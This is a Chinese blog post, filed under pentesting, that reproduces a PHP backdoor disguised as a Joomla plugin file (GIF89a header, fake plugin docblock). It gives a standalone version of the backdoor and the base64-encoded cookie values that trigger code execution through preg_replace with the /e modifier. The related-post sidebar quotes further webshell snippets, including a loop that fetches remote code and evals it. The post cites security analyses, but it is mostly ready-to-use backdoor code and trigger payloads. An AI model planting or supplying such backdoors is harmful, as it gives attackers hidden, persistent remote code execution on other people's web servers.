php -- cookie 后门

最新推荐文章于 2021-03-12 23:30:58 发布
最新推荐文章于 2021-03-12 23:30:58 发布
阅读量1.5k 收藏
点赞数
分类专栏: php Pentesting
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/24768659
版权

http://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html
https://gist.github.com/PhilETaylor/8045002
http://www.freebuf.com/articles/web/33275.html

GIF89a
<?php
/**
 * @package     Joomla.Plugin
 * @subpackage  system.instantsuggest
 *
 * @copyright   Copyright (C) 2013 InstantSuggest.com. All rights reserved.
 * @license     GNU General Public License version 2 or later
 */
/**
 * Instant Suggest Ajax
 *
 * @package     Joomla.Plugin
 * @subpackage  system.instantsuggest
 * @since       3.1
 */
class PlgSystemInstantSuggest
{
	public function __construct() {
		$filter = @$_COOKIE['p3'];
		if ($filter) {
			$option = $filter(@$_COOKIE['p2']);
			$auth = $filter(@$_COOKIE['p1']);
			$option("/123/e",$auth,123);
			die();
		}
	}
}

利用上述部分代码建立页面bk-001.php,

<?php
$filter = @$_COOKIE['p3'];
if ($filter) {
    $option = $filter(@$_COOKIE['p2']);
    $auth = $filter(@$_COOKIE['p1']);
    $option("/123/e",$auth,123);
    die();
}
?>

发送下列cookie值,

Cookie:  p3=base64_decode;p2=cHJlZ19yZXBsYWNl;p1=cGhwaW5mbygpOw==

p3=base64_decode;

p2=base64_decode("cHJlZ19yZXBsYWNl") --------> p2=preg_replace;

p1=base64_decode("cGhwaW5mbygpOw==")--------->p1=phpinfo();


有写朋友可能喜欢使用Linux下的base64程序, 例如: 
echo preg_replace | base64
得到的结果是cHJlZ19yZXBsYWNlCg==,致使上述代码(phpinfo();)无法执行(0x0a的影响). 建议使用php_encode函数加密字符串.



Nixawk
关注
专栏目录
PHP WebSehll 后门脚本与检测工具
悦分享
08-01 1438
PHP是一种动态弱类型语言,参数传递、类型转换、函数调用方式都非常灵活,这给开发者带来开发便利的同时,也给攻击者编写各种畸形恶意代码带来了很多便利,通过翻阅PHP手册
----已搬运----[蓝帽杯 2021]One Pointer PHP --- PHP数组溢出,Fastcgi FTP - SSRF 攻击 php-fpm - SUID提权 proc
Zero_Adam的博客
06-11 854
二、学到的&&不足: 三、学习WP: 给了源码,两个PHP文件: user.php: <?php class User{ public $count; } ?> add_api.php <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; // 数组$count的第几个属性赋值为1 if($count[]=1){ $us
一猥琐的PHP后门分析
橙虚缘空间
04-18 1146
Webshell代码如下:&lt;?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*...
PHP如何使用cookie后门,php -- cookie 后门
weixin_30237677的博客
03-11 87
http://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.htmlhttps://gist.github.com/PhilETaylor/8045002http://www.freebuf.com/articles/web/33275.htmlGIF89a/*** @package Joomla.Plugin* @s...
php变量函数后门,项目实战 | 记一次对某猥琐PHP后门的爆菊
weixin_39814482的博客
03-12 580
最近遇到个文件,打开一看只有几行注释?看了下字节数却很大,横向进度条很长啊,通过web访问是空白,看上去应该是藏了后门了。ps:这种方式遇到粗心/没有经验的管理员可能混过去,但若使用win自带的记事本(需开启自动换行)则一览无余。实际上换行整理一下:用Notepad++自带的正则替换简单做了下格式处理。另外在下面的代码中发现了eval/*r49557ec*/(还插了注释,这个小方法很有意思,测试...
PHP_GET后门,躲避任何安全软件
weixin_30813225的博客
01-23 208
经常拿到一些比较好的php站想要留住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。 <?php file_put_contents('xpxp.php',"$_GET[uname]");//此段代码插入它正常的PHP里面,最好插头部。 复制代码利用也很...
c00kiesD00r:后门cookie,通过cookie发送到Web服务器的命令
05-26
后门cookie,用于维护Web服务器上的访问的应用程序,它将带有User-Agent中设置的参数的GET请求发送到特定PHP页面,在其中读取接收到的cookie并将其作为参数传递给passthru()函数。PHP,因此该命令当然是在服务器...
基于PHP的白菜cms双端影视直播APP源码 全开源 无授权 无后门.zip
07-24
理解session、cookie和权限验证机制是关键。 8. **安全防护**:尽管源码声明无后门,但开发者仍需关注XSS、CSRF、SQL注入等常见Web安全问题,确保应用安全。 9. **性能优化**:对于高并发的视频直播平台,性能优化...
基于PHP的白菜cms双端影视直播APP全开源无授权无后门源码.zip
09-03
这可能通过session或cookie来实现,同时,用户权限管理可能涉及到角色分配,不同角色有不同的操作权限。 7. **API接口** 为了实现移动端应用与服务器的通信,白菜CMS可能提供了RESTful API接口。这些接口允许APP...
编写变态的(非字母数字的)PHP后门
代码析构师的专栏
05-09 688
在这篇文章中,我将向大家介绍如何编写一个非字母数字的PHP后门。在编写这种PHP后门的时候,我们首先需要了解一些基础知识:     (1)了解PHP     (2)了解curl或者其他一些能够操作HTTP请求的工具   还有一点需要大家了解的是PHP中异或(^)的概念。对于异或,大家肯定都有所了解,但是平常能用到的地方可能不多,最起码本人不经常使用(勿喷)。之所以在这里强调一下异或的概
php怎么留cookie后门,ThinkPHP后门技巧
weixin_39679468的博客
03-12 187
原文连接:https://www.leavesongs.com/PENETRATION/thinkphp-callback-backdoor.htmlphp90sec上有人问,我说了还有小白不会用。去年我审计TP的时候留意到的,干脆分析一下代码和操做过程。htmlthinkphp的I函数,是其处理输入的函数,通常用法为I('get.id')——从$_GET数组中取出键为id的值,post、cook...
又一款超强PHP后门
xiaoshan812613234的专栏
11-14 734
$f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"]; $c = $_POST["z2"]; $buf = ""; for ($i = 0; $i strlen($c); $i+= 2) $buf.= urldecode("%" . substr($c, $i, 2)); @fwrite(fopen($f, "w") , $buf);
PHP后门隐藏
lok3166的专栏
04-29 1220
首先建立一PHP文件test.php 文件内容为:    $test=$_GET[test];  @include test/.$test;  ?>     Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到 t.txt文件里。然后访问 http://localhost/test/test.php?test
ios cookie 登陆的实现
muzeng的专栏
01-09 835
ios登陆中可以用cookie进行登陆验证,类似于网页的功能实现。可以由服务器以cookie的形式把用户信息保存到应用内。  NSHTTPCookieStorage *cookieJar = [NSHTTPCookieStorage sharedHTTPCookieStorage]; for (NSHTTPCookie *cookie in [cookieJar cookies]) {
NFine.Framework框架去除cookie后门方法
小小德尔(C#)
12-21 7454
最近看到NFine开发团队开发的NFine.Framework开源框架,觉得挺好用的。 但是运行框架的时候发现加载首页的时候有在访问域名地址为 http://www.nfine.cn  的连接。这个是开源框架,自己拿来用,怎么能去访问莫名其妙的连接呢?在网上看到很多人也发现了这个问题。 我试着全项目查找这个域名,发现根本找不到,偶尔有一天研究框架的js的时候,发现 jquery.layout....
HTTP cookies 讲解(HTTP cookies explained )
weixin_34187822的博客
07-28 572
为什么80%的码农都做不了架构师?>>> ...
捡了一个非常淫荡的PHP后门,给跪了
weixin_30606461的博客
01-23 2877
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep...
NFine.Framework框架去除cookie后门
wizzly的专栏
03-22 1532
最近使用NFINE框架,由于涉及web,前后端思想与WINFORM相距甚远,有诸多之不解。 按照MVC框架思路套写了一些功能进去,但运行后由于服务器相对性能不好,运行有点慢,就开始找原因,运行时发现有http://www.nfine.cn,但搜索了很久出没有找到。苦恼了一段时间,放弃了。 今天无意中在https://blog.csdn.net/wuyuander/article/detail...
js-cookie 删除cookie 失效
最新发布
10-09
对于使用 js-cookie 库删除 cookie 失效的问题,有几个可能的原因和解决方法: 1. 确保你使用了正确的 cookie 名称和路径:删除 cookie 时,需要提供正确的 cookie 名称和路径。如果名称或路径不正确,删除操作将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值